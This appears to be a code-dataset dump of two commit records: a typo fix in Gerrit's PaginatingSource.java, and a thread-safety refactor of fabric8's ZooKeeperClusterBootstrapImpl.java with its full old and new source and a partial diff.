(pageResultSize == pageSize && r.size() <= limit) { // get 1 more than the limit pageSize = getNextPageSize(pageSize, pageSizeMultiplier); ResultSet<T> next = indexConfig.paginationType().equals(PaginationType.SEARCH_AFTER) ? 
p.restart(searchAfter, pageSize) : p.restart(nextStart, pageSize); pageResultSize = 0; for (T data : buffer(next)) { if (match(data)) { r.add(data); } pageResultSize++; } nextStart += pageResultSize; searchAfter = next.searchAfter(); } } if (start >= r.size()) { return ImmutableList.of(); } else if (start > 0) { return ImmutableList.copyOf(r.subList(start, r.size())); } return ImmutableList.copyOf(r); }); } @Override public ResultSet<FieldBundle> readRaw() { // TOOD(hiesel): Implement throw new UnsupportedOperationException("not implemented"); } private Iterable<T> buffer(ResultSet<T> scanner) { return FluentIterable.from(Iterables.partition(scanner, 50)) .transformAndConcat(this::transformBuffer); } /** * Checks whether the given object matches. * * @param object the object to be matched * @return whether the given object matches */ protected boolean match(T object) { return true; } protected boolean isMatchable() { return true; } protected List<T> transformBuffer(List<T> buffer) { return buffer; } @Override public int getCardinality() { return cardinality; } private int getNextPageSize(int pageSize, int pageSizeMultiplier) { List<Integer> possiblePageSizes = new ArrayList<>(3); try { possiblePageSizes.add(Math.multiplyExact(pageSize, pageSizeMultiplier)); } catch (ArithmeticException e) { possiblePageSizes.add(Integer.MAX_VALUE); } if (indexConfig.maxPageSize() > 0) { possiblePageSizes.add(indexConfig.maxPageSize()); } if (indexConfig.maxLimit() > 0) { possiblePageSizes.add(indexConfig.maxLimit()); } return Ordering.natural().min(possiblePageSizes); } }
PaginatingSource: Fix typo Release-Notes: skip Signed-off-by: Edwin Kempin <[email protected]> Change-Id: Ib7395d80d1378b39181180ffed44053ab26906bf
java/com/google/gerrit/index/query/PaginatingSource.java
PaginatingSource: Fix typo
<ide><path>ava/com/google/gerrit/index/query/PaginatingSource.java <ide> <ide> @Override <ide> public ResultSet<FieldBundle> readRaw() { <del> // TOOD(hiesel): Implement <add> // TODO(hiesel): Implement <ide> throw new UnsupportedOperationException("not implemented"); <ide> } <ide>
Java
apache-2.0
d61b4d186e3c741d32c21aaa55bd606134e09061
0
mwringe/fabric8,christian-posta/fabric8,mwringe/fabric8,dhirajsb/fuse,rmarting/fuse,ffang/fuse-1,jludvice/fabric8,EricWittmann/fabric8,rajdavies/fabric8,rmarting/fuse,KurtStam/fabric8,rajdavies/fabric8,punkhorn/fabric8,dhirajsb/fabric8,chirino/fabric8v2,PhilHardwick/fabric8,aslakknutsen/fabric8,joelschuster/fuse,jludvice/fabric8,opensourceconsultant/fuse,zmhassan/fabric8,opensourceconsultant/fuse,punkhorn/fuse,migue/fabric8,rnc/fabric8,chirino/fabric8,gashcrumb/fabric8,ffang/fuse-1,EricWittmann/fabric8,hekonsek/fabric8,chirino/fabric8,rmarting/fuse,christian-posta/fabric8,christian-posta/fabric8,sobkowiak/fabric8,hekonsek/fabric8,avano/fabric8,jimmidyson/fabric8,KurtStam/fabric8,sobkowiak/fabric8,janstey/fuse-1,hekonsek/fabric8,chirino/fuse,janstey/fuse,migue/fabric8,PhilHardwick/fabric8,rnc/fabric8,jimmidyson/fabric8,dhirajsb/fabric8,gnodet/fuse,cunningt/fuse,gashcrumb/fabric8,gashcrumb/fabric8,KurtStam/fabric8,rajdavies/fabric8,zmhassan/fabric8,janstey/fuse,janstey/fuse,rhuss/fabric8,ffang/fuse-1,rnc/fabric8,rhuss/fabric8,chirino/fabric8v2,gashcrumb/fabric8,punkhorn/fabric8,christian-posta/fabric8,tadayosi/fuse,KurtStam/fabric8,rajdavies/fabric8,chirino/fabric8,jboss-fuse/fuse,PhilHardwick/fabric8,cunningt/fuse,janstey/fuse-1,rnc/fabric8,hekonsek/fabric8,rhuss/fabric8,tadayosi/fuse,PhilHardwick/fabric8,jimmidyson/fabric8,janstey/fuse,sobkowiak/fabric8,avano/fabric8,jboss-fuse/fuse,jludvice/fabric8,mwringe/fabric8,jludvice/fabric8,jonathanchristison/fabric8,jonathanchristison/fabric8,aslakknutsen/fabric8,sobkowiak/fabric8,gnodet/fuse,janstey/fabric8,jimmidyson/fabric8,dejanb/fuse,dhirajsb/fabric8,avano/fabric8,dhirajsb/fabric8,chirino/fuse,punkhorn/fabric8,janstey/fabric8,aslakknutsen/fabric8,joelschuster/fuse,jonathanchristison/fabric8,dejanb/fuse,chirino/fabric8v2,sobkowiak/fuse,joelschuster/fuse,sobkowiak/fuse,opensourceconsultant/fuse,mwringe/fabric8,migue/fabric8,EricWittmann/fabric8,jonathanchristison/fabric8,avano/fabric8,punkhorn/fabric8,punkhorn/fuse,jboss-fuse/fuse,janstey/fuse-1,zmhassan/fabric8,gnodet/fuse,rnc/fabric8,dejanb/fuse,gnodet/fuse,chirino/fabric8,zmhassan/fabric8,hekonsek/fabric8,janstey/fabric8,dhirajsb/fuse,chirino/fabric8v2,rhuss/fabric8,migue/fabric8,EricWittmann/fabric8,jimmidyson/fabric8
/** * Copyright (C) FuseSource, Inc. * http://fusesource.com * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.fusesource.fabric.internal; import org.apache.curator.framework.CuratorFramework; import org.apache.felix.scr.annotations.Activate; import org.apache.felix.scr.annotations.Component; import org.apache.felix.scr.annotations.Deactivate; import org.apache.felix.scr.annotations.Reference; import org.apache.felix.scr.annotations.Service; import org.apache.zookeeper.KeeperException; import org.fusesource.fabric.api.CreateEnsembleOptions; import org.fusesource.fabric.api.DataStore; import org.fusesource.fabric.api.DataStoreRegistrationHandler; import org.fusesource.fabric.api.FabricException; import org.fusesource.fabric.api.FabricService; import org.fusesource.fabric.api.ZooKeeperClusterBootstrap; import org.fusesource.fabric.api.jcip.GuardedBy; import org.fusesource.fabric.api.jcip.Immutable; import org.fusesource.fabric.api.jcip.ThreadSafe; import org.fusesource.fabric.api.scr.AbstractComponent; import org.fusesource.fabric.api.scr.ValidatingReference; import org.fusesource.fabric.utils.HostUtils; import org.fusesource.fabric.utils.OsgiUtils; import org.fusesource.fabric.zookeeper.ZkDefs; import org.osgi.framework.Bundle; import org.osgi.framework.BundleContext; import org.osgi.framework.BundleException; import org.osgi.service.cm.Configuration; import org.osgi.service.cm.ConfigurationAdmin; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.io.InputStream; import java.io.StringWriter; import java.net.UnknownHostException; import java.util.Collections; import java.util.Dictionary; import java.util.Hashtable; import java.util.Map; import java.util.Properties; import static org.fusesource.fabric.utils.BundleUtils.instalBundle; import static org.fusesource.fabric.utils.BundleUtils.installOrStopBundle; import static org.fusesource.fabric.utils.Ports.mapPortToRange; import static org.fusesource.fabric.zookeeper.utils.ZooKeeperUtils.getStringData; @ThreadSafe @Component(name = "org.fusesource.fabric.zookeeper.cluster.bootstrap", description = "Fabric ZooKeeper Cluster Bootstrap", immediate = true) // Done @Service(ZooKeeperClusterBootstrap.class) public final class ZooKeeperClusterBootstrapImpl extends AbstractComponent implements ZooKeeperClusterBootstrap { private static final Long FABRIC_SERVICE_TIMEOUT = 60000L; private static final Logger LOGGER = LoggerFactory.getLogger(ZooKeeperClusterBootstrapImpl.class); @Reference(referenceInterface = ConfigurationAdmin.class) private final ValidatingReference<ConfigurationAdmin> configAdmin = new ValidatingReference<ConfigurationAdmin>(); @Reference(referenceInterface = DataStoreRegistrationHandler.class) private final ValidatingReference<DataStoreRegistrationHandler> registrationHandler = new ValidatingReference<DataStoreRegistrationHandler>(); @Immutable static class ComponentState { private final Map<String, String> configuration; private final 
BundleContext bundleContext; ComponentState (BundleContext bundleContext, Map<String,String> configuration) { this.bundleContext = bundleContext; this.configuration = Collections.unmodifiableMap(configuration); } Map<String, String> getConfiguration() { return configuration; } BundleContext getBundleContext() { return bundleContext; } } @GuardedBy("this") private ComponentState componentState; @Activate synchronized void activate(BundleContext bundleContext, Map<String,String> configuration) { componentState = new ComponentState (bundleContext, configuration); new Thread(new Runnable() { @Override public void run() { createOnActivate(); activateComponent(); } }).start(); } @Deactivate synchronized void deactivate() { deactivateComponent(); } synchronized ComponentState getComponentState() { return componentState; } private void createOnActivate() { org.apache.felix.utils.properties.Properties userProps = null; try { userProps = new org.apache.felix.utils.properties.Properties(new File(System.getProperty("karaf.home") + "/etc/users.properties")); } catch (IOException e) { LOGGER.warn("Failed to load users from etc/users.properties. No users will be imported.", e); } CreateEnsembleOptions createOpts = CreateEnsembleOptions.builder().fromSystemProperties().users(userProps).build(); if (createOpts.isEnsembleStart()) { createInternal(createOpts); } } @Override public void create(CreateEnsembleOptions options) { assertValid(); createInternal(options); } private synchronized void createInternal(CreateEnsembleOptions options) { try { int minimumPort = options.getMinimumPort(); int maximumPort = options.getMaximumPort(); String zooKeeperServerHost = options.getBindAddress(); int zooKeeperServerPort = options.getZooKeeperServerPort(); int zooKeeperServerConnectionPort = options.getZooKeeperServerConnectionPort(); int mappedPort = mapPortToRange(zooKeeperServerPort, minimumPort, maximumPort); String connectionUrl = getConnectionAddress() + ":" + zooKeeperServerConnectionPort; // Create configuration updateDataStoreConfig(options.getDataStoreProperties()); createZooKeeeperServerConfig(zooKeeperServerHost, mappedPort, options); Map<String, String> configuration = getComponentState().getConfiguration(); registrationHandler.get().addRegistrationCallback(new DataStoreBootstrapTemplate(connectionUrl, configuration, options)); // Create the client configuration createZooKeeeperConfig(connectionUrl, options); // Reset the autostart flag if (options.isEnsembleStart()) { System.setProperty(CreateEnsembleOptions.ENSEMBLE_AUTOSTART, Boolean.FALSE.toString()); File file = new File(System.getProperty("karaf.base") + "/etc/system.properties"); org.apache.felix.utils.properties.Properties props = new org.apache.felix.utils.properties.Properties(file); props.put(CreateEnsembleOptions.ENSEMBLE_AUTOSTART, Boolean.FALSE.toString()); props.save(); } startBundles(options); //Wait until Fabric Service becomes available. 
OsgiUtils.waitForSerice(FabricService.class, null, FABRIC_SERVICE_TIMEOUT ); } catch (Exception e) { throw new FabricException("Unable to create zookeeper server configuration", e); } } @Override public void clean() { assertValid(); try { BundleContext bundleContext = componentState.getBundleContext(); Bundle bundleFabricZooKeeper = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-zookeeper", "mvn:org.fusesource.fabric/fabric-zookeeper/" + FabricConstants.FABRIC_VERSION); for (; ; ) { Configuration[] configs = configAdmin.get().listConfigurations("(|(service.factoryPid=org.fusesource.fabric.zookeeper.server)(service.pid=org.fusesource.fabric.zookeeper))"); if (configs != null && configs.length > 0) { for (Configuration config : configs) { config.delete(); } Thread.sleep(100); } else { break; } } File zkDir = new File("data/zookeeper"); if (zkDir.isDirectory()) { File newZkDir = new File("data/zookeeper." + System.currentTimeMillis()); if (!zkDir.renameTo(newZkDir)) { newZkDir = zkDir; } delete(newZkDir); } bundleFabricZooKeeper.start(); } catch (Exception e) { throw new FabricException("Unable to delete zookeeper configuration", e); } } private void updateDataStoreConfig(Map<String, String> dataStoreConfiguration) throws IOException { boolean updated = false; Configuration config = configAdmin.get().getConfiguration(DataStore.DATASTORE_TYPE_PID); Dictionary<String, Object> properties = config.getProperties(); for (Map.Entry<String, String> entry : dataStoreConfiguration.entrySet()) { String key = entry.getKey(); String value = entry.getValue(); if (!value.equals(properties.put(key, value))) { updated = true; } } if (updated) { //We unbind, so that we know exactly when we get the re-configured instance. //dataStoreRegistrationHandler.unbind(); config.setBundleLocation(null); config.update(properties); } } /** * Creates ZooKeeper server configuration */ private void createZooKeeeperServerConfig(String serverHost, int serverPort, CreateEnsembleOptions options) throws IOException { Configuration config = configAdmin.get().createFactoryConfiguration("org.fusesource.fabric.zookeeper.server"); Hashtable properties = new Hashtable<String, Object>(); if (options.isAutoImportEnabled()) { loadPropertiesFrom(properties, options.getImportPath() + "/fabric/configs/versions/1.0/profiles/default/org.fusesource.fabric.zookeeper.server.properties"); } properties.put("tickTime", "2000"); properties.put("initLimit", "10"); properties.put("syncLimit", "5"); properties.put("dataDir", "data/zookeeper/0000"); properties.put("clientPort", Integer.toString(serverPort)); properties.put("clientPortAddress", serverHost); properties.put("fabric.zookeeper.pid", "org.fusesource.fabric.zookeeper.server-0000"); config.setBundleLocation(null); config.update(properties); } /** * Creates ZooKeeper client configuration. * @param connectionUrl * @param options * @throws IOException */ private void createZooKeeeperConfig(String connectionUrl, CreateEnsembleOptions options) throws IOException { Configuration config = configAdmin.get().getConfiguration("org.fusesource.fabric.zookeeper"); Hashtable properties = new Hashtable<String, Object>(); if (options.isAutoImportEnabled()) { loadPropertiesFrom(properties, options.getImportPath() + "/fabric/configs/versions/1.0/profiles/default/org.fusesource.fabric.zookeeper.properties"); } properties.put("zookeeper.url", connectionUrl); properties.put("zookeeper.timeout", System.getProperties().containsKey("zookeeper.timeout") ? 
System.getProperties().getProperty("zookeeper.timeout") : "30000"); properties.put("fabric.zookeeper.pid", "org.fusesource.fabric.zookeeper"); properties.put("zookeeper.password", options.getZookeeperPassword()); config.setBundleLocation(null); config.update(properties); } private void startBundles(CreateEnsembleOptions options) throws BundleException { // Install or stop the fabric-configadmin bridge BundleContext bundleContext = getComponentState().getBundleContext(); Bundle bundleFabricAgent = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-agent", "mvn:org.fusesource.fabric/fabric-agent/" + FabricConstants.FABRIC_VERSION); Bundle bundleFabricConfigAdmin = instalBundle(bundleContext, "org.fusesource.fabric.fabric-configadmin", "mvn:org.fusesource.fabric/fabric-configadmin/" + FabricConstants.FABRIC_VERSION); Bundle bundleFabricCommands = instalBundle(bundleContext, "org.fusesource.fabric.fabric-commands ", "mvn:org.fusesource.fabric/fabric-commands/" + FabricConstants.FABRIC_VERSION); bundleFabricCommands.start(); bundleFabricConfigAdmin.start(); //Check if the agent is configured to auto start. if (options.isAgentEnabled()) { bundleFabricAgent.start(); } } private void loadPropertiesFrom(Hashtable hashtable, String from) { InputStream is = null; Properties properties = new Properties(); try { is = new FileInputStream(from); properties.load(is); for (String key : properties.stringPropertyNames()) { hashtable.put(key, properties.get(key)); } } catch (Exception e) { // Ignore } finally { if (is != null) { try { is.close(); } catch (Exception e) { // Ignore } } } } private static void delete(File dir) { if (dir.isDirectory()) { for (File child : dir.listFiles()) { delete(child); } } if (dir.exists()) { dir.delete(); } } private static String getConnectionAddress() throws UnknownHostException { String resolver = System.getProperty(ZkDefs.LOCAL_RESOLVER_PROPERTY, System.getProperty(ZkDefs.GLOBAL_RESOLVER_PROPERTY, ZkDefs.LOCAL_HOSTNAME)); if (resolver.equals(ZkDefs.LOCAL_HOSTNAME)) { return HostUtils.getLocalHostName(); } else if (resolver.equals(ZkDefs.LOCAL_IP)) { return HostUtils.getLocalIp(); } else if (resolver.equals(ZkDefs.MANUAL_IP) && System.getProperty(ZkDefs.MANUAL_IP) != null) { return System.getProperty(ZkDefs.MANUAL_IP); } else return HostUtils.getLocalHostName(); } private static String toString(Properties source) throws IOException { StringWriter writer = new StringWriter(); source.store(writer, null); return writer.toString(); } private static Properties getProperties(CuratorFramework client, String file, Properties defaultValue) throws Exception { try { String v = getStringData(client, file); if (v != null) { return DataStoreHelpers.toProperties(v); } else { return defaultValue; } } catch (KeeperException.NoNodeException e) { return defaultValue; } } void bindConfigAdmin(ConfigurationAdmin service) { this.configAdmin.set(service); } void unbindConfigAdmin(ConfigurationAdmin service) { this.configAdmin.set(null); } void bindRegistrationHandler(DataStoreRegistrationHandler service) { this.registrationHandler.set(service); } void unbindRegistrationHandler(DataStoreRegistrationHandler service) { this.registrationHandler.set(null); } }
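The refactor above replaces two mutable fields with a single immutable ComponentState snapshot that is always written and read under a lock. The following is a minimal, framework-free sketch of that pattern; the class and field names are illustrative and not part of the fabric8 code.

// Minimal sketch of the immutable-snapshot pattern used above: activation data
// is captured once into an immutable holder, and later readers always go
// through a synchronized accessor so they see a consistent pair of values.
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

public class SnapshotStateSketch {

    static final class State {
        private final String contextName;
        private final Map<String, String> configuration;

        State(String contextName, Map<String, String> configuration) {
            this.contextName = contextName;
            this.configuration = Collections.unmodifiableMap(new HashMap<>(configuration));
        }

        String getContextName() { return contextName; }
        Map<String, String> getConfiguration() { return configuration; }
    }

    private State state;   // guarded by 'this'

    synchronized void activate(String contextName, Map<String, String> configuration) {
        state = new State(contextName, configuration);   // publish one snapshot
    }

    synchronized State getState() {
        return state;
    }
}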
fabric/fabric-core/src/main/java/org/fusesource/fabric/internal/ZooKeeperClusterBootstrapImpl.java
/** * Copyright (C) FuseSource, Inc. * http://fusesource.com * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.fusesource.fabric.internal; import org.apache.curator.framework.CuratorFramework; import org.apache.felix.scr.annotations.Activate; import org.apache.felix.scr.annotations.Component; import org.apache.felix.scr.annotations.Deactivate; import org.apache.felix.scr.annotations.Reference; import org.apache.felix.scr.annotations.Service; import org.apache.zookeeper.KeeperException; import org.fusesource.fabric.api.CreateEnsembleOptions; import org.fusesource.fabric.api.DataStore; import org.fusesource.fabric.api.DataStoreRegistrationHandler; import org.fusesource.fabric.api.FabricException; import org.fusesource.fabric.api.FabricService; import org.fusesource.fabric.api.ZooKeeperClusterBootstrap; import org.fusesource.fabric.api.scr.AbstractComponent; import org.fusesource.fabric.api.scr.ValidatingReference; import org.fusesource.fabric.utils.HostUtils; import org.fusesource.fabric.utils.OsgiUtils; import org.fusesource.fabric.zookeeper.ZkDefs; import org.osgi.framework.Bundle; import org.osgi.framework.BundleContext; import org.osgi.framework.BundleException; import org.osgi.service.cm.Configuration; import org.osgi.service.cm.ConfigurationAdmin; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.io.InputStream; import java.io.StringWriter; import java.net.UnknownHostException; import java.util.Dictionary; import java.util.Hashtable; import java.util.Map; import java.util.Properties; import static org.fusesource.fabric.utils.BundleUtils.instalBundle; import static org.fusesource.fabric.utils.BundleUtils.installOrStopBundle; import static org.fusesource.fabric.utils.Ports.mapPortToRange; import static org.fusesource.fabric.zookeeper.utils.ZooKeeperUtils.getStringData; @Component(name = "org.fusesource.fabric.zookeeper.cluster.bootstrap", description = "Fabric ZooKeeper Cluster Bootstrap", immediate = true) @Service(ZooKeeperClusterBootstrap.class) public class ZooKeeperClusterBootstrapImpl extends AbstractComponent implements ZooKeeperClusterBootstrap { private static final Long FABRIC_SERVICE_TIMEOUT = 60000L; private static final Logger LOGGER = LoggerFactory.getLogger(ZooKeeperClusterBootstrapImpl.class); @Reference(referenceInterface = ConfigurationAdmin.class) private final ValidatingReference<ConfigurationAdmin> configAdmin = new ValidatingReference<ConfigurationAdmin>(); @Reference(referenceInterface = DataStoreRegistrationHandler.class) private final ValidatingReference<DataStoreRegistrationHandler> registrationHandler = new ValidatingReference<DataStoreRegistrationHandler>(); private Map<String, String> configuration; private BundleContext bundleContext; @Activate synchronized void activate(BundleContext bundleContext, Map<String,String> configuration) { this.bundleContext = bundleContext; activateComponent(); try { this.configuration = configuration; new Thread(new Runnable() { 
@Override public void run() { create(); } }).start(); } catch (RuntimeException rte) { deactivateComponent(); throw rte; } } @Deactivate synchronized void deactivate() { deactivateComponent(); } void create() { org.apache.felix.utils.properties.Properties userProps = null; try { userProps = new org.apache.felix.utils.properties.Properties(new File(System.getProperty("karaf.home") + "/etc/users.properties")); } catch (IOException e) { LOGGER.warn("Failed to load users from etc/users.properties. No users will be imported.", e); } CreateEnsembleOptions createOpts = CreateEnsembleOptions.builder().fromSystemProperties().users(userProps).build(); if (createOpts.isEnsembleStart()) { create(createOpts); } } public void create(CreateEnsembleOptions options) { try { int minimumPort = options.getMinimumPort(); int maximumPort = options.getMaximumPort(); String zooKeeperServerHost = options.getBindAddress(); int zooKeeperServerPort = options.getZooKeeperServerPort(); int zooKeeperServerConnectionPort = options.getZooKeeperServerConnectionPort(); int mappedPort = mapPortToRange(zooKeeperServerPort, minimumPort, maximumPort); String connectionUrl = getConnectionAddress() + ":" + zooKeeperServerConnectionPort; // Create configuration updateDataStoreConfig(options.getDataStoreProperties()); createZooKeeeperServerConfig(zooKeeperServerHost, mappedPort, options); registrationHandler.get().addRegistrationCallback(new DataStoreBootstrapTemplate(connectionUrl, configuration, options)); // Create the client configuration createZooKeeeperConfig(connectionUrl, options); // Reset the autostart flag if (options.isEnsembleStart()) { System.setProperty(CreateEnsembleOptions.ENSEMBLE_AUTOSTART, Boolean.FALSE.toString()); File file = new File(System.getProperty("karaf.base") + "/etc/system.properties"); org.apache.felix.utils.properties.Properties props = new org.apache.felix.utils.properties.Properties(file); props.put(CreateEnsembleOptions.ENSEMBLE_AUTOSTART, Boolean.FALSE.toString()); props.save(); } startBundles(options); //Wait until Fabric Service becomes available. OsgiUtils.waitForSerice(FabricService.class, null, FABRIC_SERVICE_TIMEOUT ); } catch (Exception e) { throw new FabricException("Unable to create zookeeper server configuration", e); } } public void clean() { try { Bundle bundleFabricZooKeeper = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-zookeeper", "mvn:org.fusesource.fabric/fabric-zookeeper/" + FabricConstants.FABRIC_VERSION); for (; ; ) { Configuration[] configs = configAdmin.get().listConfigurations("(|(service.factoryPid=org.fusesource.fabric.zookeeper.server)(service.pid=org.fusesource.fabric.zookeeper))"); if (configs != null && configs.length > 0) { for (Configuration config : configs) { config.delete(); } Thread.sleep(100); } else { break; } } File zkDir = new File("data/zookeeper"); if (zkDir.isDirectory()) { File newZkDir = new File("data/zookeeper." 
+ System.currentTimeMillis()); if (!zkDir.renameTo(newZkDir)) { newZkDir = zkDir; } delete(newZkDir); } bundleFabricZooKeeper.start(); } catch (Exception e) { throw new FabricException("Unable to delete zookeeper configuration", e); } } private void updateDataStoreConfig(Map<String, String> dataStoreConfiguration) throws IOException { boolean updated = false; Configuration config = configAdmin.get().getConfiguration(DataStore.DATASTORE_TYPE_PID); Dictionary<String, Object> properties = config.getProperties(); for (Map.Entry<String, String> entry : dataStoreConfiguration.entrySet()) { String key = entry.getKey(); String value = entry.getValue(); if (!value.equals(properties.put(key, value))) { updated = true; } } if (updated) { //We unbind, so that we know exactly when we get the re-configured instance. //dataStoreRegistrationHandler.unbind(); config.setBundleLocation(null); config.update(properties); } } /** * Creates ZooKeeper server configuration */ private void createZooKeeeperServerConfig(String serverHost, int serverPort, CreateEnsembleOptions options) throws IOException { Configuration config = configAdmin.get().createFactoryConfiguration("org.fusesource.fabric.zookeeper.server"); Hashtable properties = new Hashtable<String, Object>(); if (options.isAutoImportEnabled()) { loadPropertiesFrom(properties, options.getImportPath() + "/fabric/configs/versions/1.0/profiles/default/org.fusesource.fabric.zookeeper.server.properties"); } properties.put("tickTime", "2000"); properties.put("initLimit", "10"); properties.put("syncLimit", "5"); properties.put("dataDir", "data/zookeeper/0000"); properties.put("clientPort", Integer.toString(serverPort)); properties.put("clientPortAddress", serverHost); properties.put("fabric.zookeeper.pid", "org.fusesource.fabric.zookeeper.server-0000"); config.setBundleLocation(null); config.update(properties); } /** * Creates ZooKeeper client configuration. * @param connectionUrl * @param options * @throws IOException */ private void createZooKeeeperConfig(String connectionUrl, CreateEnsembleOptions options) throws IOException { Configuration config = configAdmin.get().getConfiguration("org.fusesource.fabric.zookeeper"); Hashtable properties = new Hashtable<String, Object>(); if (options.isAutoImportEnabled()) { loadPropertiesFrom(properties, options.getImportPath() + "/fabric/configs/versions/1.0/profiles/default/org.fusesource.fabric.zookeeper.properties"); } properties.put("zookeeper.url", connectionUrl); properties.put("zookeeper.timeout", System.getProperties().containsKey("zookeeper.timeout") ? 
System.getProperties().getProperty("zookeeper.timeout") : "30000"); properties.put("fabric.zookeeper.pid", "org.fusesource.fabric.zookeeper"); properties.put("zookeeper.password", options.getZookeeperPassword()); config.setBundleLocation(null); config.update(properties); } public void startBundles(CreateEnsembleOptions options) throws BundleException { // Install or stop the fabric-configadmin bridge Bundle bundleFabricAgent = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-agent", "mvn:org.fusesource.fabric/fabric-agent/" + FabricConstants.FABRIC_VERSION); Bundle bundleFabricConfigAdmin = instalBundle(bundleContext, "org.fusesource.fabric.fabric-configadmin", "mvn:org.fusesource.fabric/fabric-configadmin/" + FabricConstants.FABRIC_VERSION); Bundle bundleFabricCommands = instalBundle(bundleContext, "org.fusesource.fabric.fabric-commands ", "mvn:org.fusesource.fabric/fabric-commands/" + FabricConstants.FABRIC_VERSION); bundleFabricCommands.start(); bundleFabricConfigAdmin.start(); //Check if the agent is configured to auto start. if (options.isAgentEnabled()) { bundleFabricAgent.start(); } } private void loadPropertiesFrom(Hashtable hashtable, String from) { InputStream is = null; Properties properties = new Properties(); try { is = new FileInputStream(from); properties.load(is); for (String key : properties.stringPropertyNames()) { hashtable.put(key, properties.get(key)); } } catch (Exception e) { // Ignore } finally { if (is != null) { try { is.close(); } catch (Exception e) { // Ignore } } } } private static void delete(File dir) { if (dir.isDirectory()) { for (File child : dir.listFiles()) { delete(child); } } if (dir.exists()) { dir.delete(); } } private static String getConnectionAddress() throws UnknownHostException { String resolver = System.getProperty(ZkDefs.LOCAL_RESOLVER_PROPERTY, System.getProperty(ZkDefs.GLOBAL_RESOLVER_PROPERTY, ZkDefs.LOCAL_HOSTNAME)); if (resolver.equals(ZkDefs.LOCAL_HOSTNAME)) { return HostUtils.getLocalHostName(); } else if (resolver.equals(ZkDefs.LOCAL_IP)) { return HostUtils.getLocalIp(); } else if (resolver.equals(ZkDefs.MANUAL_IP) && System.getProperty(ZkDefs.MANUAL_IP) != null) { return System.getProperty(ZkDefs.MANUAL_IP); } else return HostUtils.getLocalHostName(); } private static String toString(Properties source) throws IOException { StringWriter writer = new StringWriter(); source.store(writer, null); return writer.toString(); } public static Properties getProperties(CuratorFramework client, String file, Properties defaultValue) throws Exception { try { String v = getStringData(client, file); if (v != null) { return DataStoreHelpers.toProperties(v); } else { return defaultValue; } } catch (KeeperException.NoNodeException e) { return defaultValue; } } void bindConfigAdmin(ConfigurationAdmin service) { this.configAdmin.set(service); } void unbindConfigAdmin(ConfigurationAdmin service) { this.configAdmin.set(null); } void bindRegistrationHandler(DataStoreRegistrationHandler service) { this.registrationHandler.set(service); } void unbindRegistrationHandler(DataStoreRegistrationHandler service) { this.registrationHandler.set(null); } }
@ThreadSafe ZooKeeperClusterBootstrapImpl
fabric/fabric-core/src/main/java/org/fusesource/fabric/internal/ZooKeeperClusterBootstrapImpl.java
@ThreadSafe ZooKeeperClusterBootstrapImpl
<ide><path>abric/fabric-core/src/main/java/org/fusesource/fabric/internal/ZooKeeperClusterBootstrapImpl.java <ide> import org.fusesource.fabric.api.FabricException; <ide> import org.fusesource.fabric.api.FabricService; <ide> import org.fusesource.fabric.api.ZooKeeperClusterBootstrap; <add>import org.fusesource.fabric.api.jcip.GuardedBy; <add>import org.fusesource.fabric.api.jcip.Immutable; <add>import org.fusesource.fabric.api.jcip.ThreadSafe; <ide> import org.fusesource.fabric.api.scr.AbstractComponent; <ide> import org.fusesource.fabric.api.scr.ValidatingReference; <ide> import org.fusesource.fabric.utils.HostUtils; <ide> import java.io.InputStream; <ide> import java.io.StringWriter; <ide> import java.net.UnknownHostException; <add>import java.util.Collections; <ide> import java.util.Dictionary; <ide> import java.util.Hashtable; <ide> import java.util.Map; <ide> import static org.fusesource.fabric.utils.Ports.mapPortToRange; <ide> import static org.fusesource.fabric.zookeeper.utils.ZooKeeperUtils.getStringData; <ide> <del>@Component(name = "org.fusesource.fabric.zookeeper.cluster.bootstrap", description = "Fabric ZooKeeper Cluster Bootstrap", immediate = true) <add>@ThreadSafe <add>@Component(name = "org.fusesource.fabric.zookeeper.cluster.bootstrap", description = "Fabric ZooKeeper Cluster Bootstrap", immediate = true) // Done <ide> @Service(ZooKeeperClusterBootstrap.class) <del>public class ZooKeeperClusterBootstrapImpl extends AbstractComponent implements ZooKeeperClusterBootstrap { <add>public final class ZooKeeperClusterBootstrapImpl extends AbstractComponent implements ZooKeeperClusterBootstrap { <ide> <ide> private static final Long FABRIC_SERVICE_TIMEOUT = 60000L; <ide> private static final Logger LOGGER = LoggerFactory.getLogger(ZooKeeperClusterBootstrapImpl.class); <ide> @Reference(referenceInterface = DataStoreRegistrationHandler.class) <ide> private final ValidatingReference<DataStoreRegistrationHandler> registrationHandler = new ValidatingReference<DataStoreRegistrationHandler>(); <ide> <del> private Map<String, String> configuration; <del> private BundleContext bundleContext; <add> @Immutable <add> static class ComponentState { <add> private final Map<String, String> configuration; <add> private final BundleContext bundleContext; <add> ComponentState (BundleContext bundleContext, Map<String,String> configuration) { <add> this.bundleContext = bundleContext; <add> this.configuration = Collections.unmodifiableMap(configuration); <add> } <add> Map<String, String> getConfiguration() { <add> return configuration; <add> } <add> BundleContext getBundleContext() { <add> return bundleContext; <add> } <add> } <add> @GuardedBy("this") private ComponentState componentState; <ide> <ide> @Activate <ide> synchronized void activate(BundleContext bundleContext, Map<String,String> configuration) { <del> this.bundleContext = bundleContext; <del> activateComponent(); <del> try { <del> this.configuration = configuration; <del> new Thread(new Runnable() { <del> @Override <del> public void run() { <del> create(); <del> } <del> }).start(); <del> } catch (RuntimeException rte) { <del> deactivateComponent(); <del> throw rte; <del> } <add> componentState = new ComponentState 